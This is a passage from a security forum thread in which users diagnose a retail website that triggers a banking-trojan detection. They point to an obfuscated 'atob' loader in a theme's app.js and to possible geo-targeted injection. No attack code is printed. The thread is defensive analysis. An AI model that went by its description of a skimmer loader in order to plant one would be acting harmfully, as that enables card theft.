AnthonyIT 0 Posted June 13, 2023 Share Posted June 13, 2023 (edited) Hi Team, One of our clients purchases equipment from the following website: https://ilsau.com.au The website frequently triggers the JS/Spy.Banker.KY trojan when browsing (usually adding an item to a shopping trolley will trigger it) The specific file that ESET flags is https://ilsau.com.au/wp-content/themes/ils2020/assets/js/app.js?ver=2.1.0 We've contacted the company that owns the website however they're unable to track down the threat. Would someone be able to provide some clues on where they should look? Thank you, Anthony Edited June 13, 2023 by Marcos Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted June 13, 2023 Administrators Share Posted June 13, 2023 Is the threat still being detected? I've added some goods to cart and proceeded to checkout but didn't get any alert. Another user posted elsewhere that he found the source of infection in php files in the "classes" folder. Link to comment Share on other sites More sharing options...
AnthonyIT 0 Posted June 13, 2023 Author Share Posted June 13, 2023 Thanks for looking at it Marcos. It is still triggering a detection. This product seems to trigger without even adding it to the cart: https://ilsau.com.au/product/tens-machine-protens/ Link to comment Share on other sites More sharing options...
Nevermind 8 Posted June 13, 2023 Share Posted June 13, 2023 (edited) Main page ilsau[.]com.au has this in it: <_script type='text/javascript' src='hxxps://ilsau[.]com.au/wp-content/themes/ils2020/assets/js/app.js?ver=2.1.0' id='il2020-app-js-js'></script> Loaded app.js contains line with 'atob' function that loads another/unwanted JS from a remote server. Thats all we can see from visitor's point of view. Until you (or a specialized company) cleans the server, the detection will always trigger. Edited June 13, 2023 by Nevermind typo Link to comment Share on other sites More sharing options...
LesRMed 26 Posted June 13, 2023 Share Posted June 13, 2023 8 hours ago, AnthonyIT said: This product seems to trigger without even adding it to the cart: https://ilsau.com.au/product/tens-machine-protens/ Just FYI, it doesn't trigger anything when I access it or even add it to the shopping cart. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted June 13, 2023 Administrators Share Posted June 13, 2023 Maybe the malicious JS is injected only when the user is from the "right" country, in this case from Australia. Link to comment Share on other sites More sharing options...
itman 1,786 Posted June 13, 2023 Share Posted June 13, 2023 (edited) 4 hours ago, Marcos said: Maybe the malicious JS is injected only when the user is from the "right" country, in this case from Australia. I couldn't get an Eset detection when accessing: https://ilsau.com.au/product/tens-machine-protens/ from the U.S. I got as far as the web page for entry of ID and credit card payment detail. -EDIT- I also disabled uBlock Origin and still could not get an Eset detection. However, Firefox still has native protections built-in to it and I do have those set to "Strict" mode. The question is if Eset will throw a detection for Edge, Chrome, etc.? Edited June 13, 2023 by itman Link to comment Share on other sites More sharing options...
AnthonyIT 0 Posted June 14, 2023 Author Share Posted June 14, 2023 Thank you for all your responses. I've passed on this information to the website owners in hope it will give them some more clues as to where to look. Note that the product I linked before: https://ilsau.com.au/product/tens-machine-protens/ is no longer triggering an alert, however clicking around the site - going into products, hitting the back button etc. Eventually it will trigger. It almost appears random in nature and the malicious JS is generated on the fly. I'm running ESET Endpoint Security 10.0.2045.0, detection engine version 27404. Chrome Version 114.0.5735.110. Will report back here if I have any more info. Link to comment Share on other sites More sharing options...
Nevermind 8 Posted June 14, 2023 Share Posted June 14, 2023 16 hours ago, itman said: The question is if Eset will throw a detection for Edge, Chrome, etc.? It will. Link to comment Share on other sites More sharing options...
Recommended Posts